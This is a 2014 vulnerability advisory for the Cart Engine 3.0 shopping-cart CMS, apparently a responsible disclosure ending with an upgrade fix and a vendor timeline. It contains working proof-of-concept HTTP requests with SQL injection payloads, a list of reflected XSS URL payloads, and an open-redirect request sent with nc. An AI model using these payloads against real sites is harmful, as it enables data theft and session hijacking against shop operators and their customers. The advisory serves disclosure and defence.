Cart Engine 3.0 Multiple vulnerabilities – SQL Injection, Reflected XSS, Open Redirect È stato salvato
Article
Cart Engine 3.0 Multiple vulnerabilities – SQL Injection, Reflected XSS, Open Redirect
15-09-2014
Cart Engine 3.0 Multiple vulnerabilities – SQL Injection, Reflected XSS, Open Redirect
Quantum Leap Advisory: Cart Engine 3.0 Multiple vulnerabilities – SQL Injection, Reflected XSS, Open Redirect – Adivsory #QLA140808
Affected Product: Cart Engine 3.0
Credits: Vulnerability discovered by Francesco Perna and Pietro Minniti of Quantum Leap s.r.l
Executive Summary
SQL Injection: Using a specially crafted HTTP request, it is possible to exploit a lack in the validation[1] of the “item_id[0]” and “item_id[]” input parameters of cart.php page. Successful exploitation of the vulnerabilities results in read sensitive data from the database and, in some cases, execute administration operation on the database or issue commands to the operating system.
Reflected XSS: Using a specially crafted HTTP request, it is possible to exploit a lack in the neutralization[2] of multiple pages output which includes the user submitted content. Successful exploitation of the vulnerabilities, results in the execution of arbitrary HTML and script code in the user’s browser in the context of the victim user’s session trough a “Reflected XSS”.
Open Redirect: Using a specially crafted HTTP request, it is possible to redirect[3] the normal browsing of users to a malicious site by modifying untrusted URL input in Referer HTTP header parameter in index.php, cart.php, msg.php and page.php pages. Successful exploitation of the vulnerabilities results in phishing scam, user credential theft, malware dissemination.
Proof of Concept
SQL Injection (based on MySQL)
A SQL Injection vulnerability has been detected on cart.php page in Cart Engine CMS. The function “sql_query” in file “cart.php” doesn’t sanitize the “$item_id” parameter, so error based and boolean-based blind or time-based blind SQL Injection attacks can be executed.
POST /cart.php HTTP/1.1
Host: eshop.hacme.hac
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://eshop.hacme.hac/detail.php?item_id=8
Cookie: PHPSESSID=iost0tdmvdobp966rbppa514f3; ce3_history[0]=12; ce3_history[1]=8
Connection: keep-alive
Content-Type: multipart/form-data; boundary=—————————109606523931762158449252347
Content-Length: 774
—————————–109606523931762158449252347
Content-Disposition: form-data; name=”AXSRF_token”
—————————–109606523931762158449252347
Content-Disposition: form-data; name=”cmd”
add
—————————–109606523931762158449252347
Content-Disposition: form-data; name=”item_id[0]”
8′ AND (SELECT 22 FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT user()),0x3a,0x3a,FLOOR(RAND()*2))a FROM INFORMATION_SCHEMA.columns GROUP BY a)b) AND ‘ql’=’ql
—————————–109606523931762158449252347
Content-Disposition: form-data; name=”qty[0]”
1
—————————–109606523931762158449252347
Content-Disposition: form-data; name=”qty[0]”
1
—————————–109606523931762158449252347–
Figure 1 shows database user.
Figure 1 – Cart Engine 3.0 SQL Injection PoC 1
POST /cart.php HTTP/1.1
Host: eshop.hacme.hac
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://eshop.hacme.hac/detail.php?item_id=13
Cookie: PHPSESSID=aci236dihehpjaldchbt6k6v23; ce3_history[0]=24; ce3_history[1]=13
Connection: keep-alive
Content-Type: multipart/form-data; boundary=—————————1948855485207142787318084006
Content-Length: 2353
—————————–1948855485207142787318084006
Content-Disposition: form-data; name=”AXSRF_token”
—————————–1948855485207142787318084006
Content-Disposition: form-data; name=”cmd”
add
—————————–1948855485207142787318084006
Content-Disposition: form-data; name=”item_id[0]”
13
—————————–1948855485207142787318084006
Content-Disposition: form-data; name=”qty[0]”
1
—————————–1948855485207142787318084006
Content-Disposition: form-data; name=”qty[0]”
1
—————————–1948855485207142787318084006
Content-Disposition: form-data; name=”prod_opt_3″
3
—————————–1948855485207142787318084006
Content-Disposition: form-data; name=”prod_opt_12″
—————————–1948855485207142787318084006
Content-Disposition: form-data; name=”item_id[]”
—————————–1948855485207142787318084006
Content-Disposition: form-data; name=”qty[]”
1
—————————–1948855485207142787318084006
Content-Disposition: form-data; name=”item_id[]”
‘ AND (SELECT 22 FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT database()),0x3a,0x3a,FLOOR(RAND()*2))a FROM INFORMATION_SCHEMA.columns GROUP BY a)b) AND ‘ql’=’ql
—————————–1948855485207142787318084006
Content-Disposition: form-data; name=”qty[]”
1
—————————–1948855485207142787318084006
Content-Disposition: form-data; name=”item_id[]”
—————————–1948855485207142787318084006
Content-Disposition: form-data; name=”qty[]”
1
—————————–1948855485207142787318084006
Content-Disposition: form-data; name=”item_id[]”
—————————–1948855485207142787318084006
Content-Disposition: form-data; name=”qty[]”
1
—————————–1948855485207142787318084006
Content-Disposition: form-data; name=”item_id[]”
—————————–1948855485207142787318084006
Content-Disposition: form-data; name=”qty[]”
1
—————————–1948855485207142787318084006
Content-Disposition: form-data; name=”item_id[]”
—————————–1948855485207142787318084006
Content-Disposition: form-data; name=”qty[]”
1
—————————–1948855485207142787318084006–
Figure 2 shows database name.
Figure 2 – Cart Engine 3.0 SQL Injection PoC 2
Reflected XSS
A Reflected XSS vulnerability has been detected on multiple pages in Cart Engine CMS. In the file “skins/default/outline.tpl”, the parameter “path” in section “drop down TOP menu (with path)” and the parameter “$print_this_page” in section “footer_content_block” are not sanitized, so an XSS attack can be executed on multiple pages.
/index.php?”><script>alert(‘XSS’)<%2fscript>
/index.php?’%3balert(‘XSS’)%2f%2f
/checkout.php?%27%3balert%28%27XSS%27%29%2f%2f
/checkout.php?%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/contact.php?”><script>alert(‘XSS’)<%2fscript>
/contact.php?’%3balert(‘XSS’)%2f%2f
/detail.php?item_id=10&’%3balert(‘XSS’)%2f%2f
/detail.php?item_id=10&”><script>alert(‘XSS’)<%2fscript>
/distro.php?’%3balert(‘XSS’)%2f%2f
/distro.php?”><script>alert(‘XSS’)<%2fscript>
/newsletter.php?’%3balert(‘XSS’)%2f%2f
/newsletter.php?”><script>alert(‘XSS’)<%2fscript>
/page.php?pid=2&”><script>alert(‘XSS’)<%2fscript>
/page.php?pid=2&’%3balert(‘XSS’)%2f%2f
/profile.php?”><script>alert(‘XSS’)<%2fscript>
/profile.php?’%3balert(‘XSS’)%2f%2f
/search.php?mod_id=_shop&cmd=list&cat_id=1&’%3balert(‘XSS’)%2f%2f
/search.php?mod_id=_shop&cmd=list&cat_id=1&”><script>alert(‘XSS’)<%2fscript>
/sitemap.php?’%3balert(‘XSS’)%2f%2f
/sitemap.php?”><script>alert(‘XSS’)<%2fscript>
/task.php?mod=qcomment&m=gbook&i=1&t=cy9NLS5Jys%2FPBgA%3D&”><script>alert(‘XSS’)<%2fscript>
/task.php?mod=qcomment&m=gbook&i=1&t=cy9NLS5Jys%2FPBgA%3D&’%3balert(‘XSS’)%2f%2f
/tell.php?’%3balert(‘XSS’)%2f%2f
/tell.php?”><script>alert(‘XSS’)<%2fscript>
Figures 3 and 4 show XSS PoC.
Figure 3 – Cart Engine 3.0 Reflected XSS PoC 1
Open Redirect
An Open Redirect vulnerability has been detected on multiple pages in Cart Engine CMS. The function “redir” in file “includes/function.php” doesn’t check the "SERVER [‘HTTP_REFERER’]" parameter, so an Open Redirect attack can be executed
## HTTP REQUEST ##
GET /page.php HTTP/1.1
Host: eshop.hacme.hac
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=
Cookie: PHPSESSID=rtg5ooetpj7resie416iu9b2s6
Connection: close
$ cat openredirect.req | nc -vvv eshop.hacme.hac 80
hacme.hac [10.0.2.80] 80 (http) open
HTTP/1.1 302 Found
Date: Sun, 10 Aug 2014 15:16:34 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.google.com/search?hl=en&q=
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
sent 403, rcvd 380
Solution
Upgrade to Cart Engine 4.0.
Disclosure Timeline
2014-08-08 – Vulnerability Discovered
2014-08-10 – Initial vendor notification
2014-08-20 – The vendor fixed the vulnerability
2014-09-15 – Public advisory
References
[1] https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
[2] https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
[3] https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet
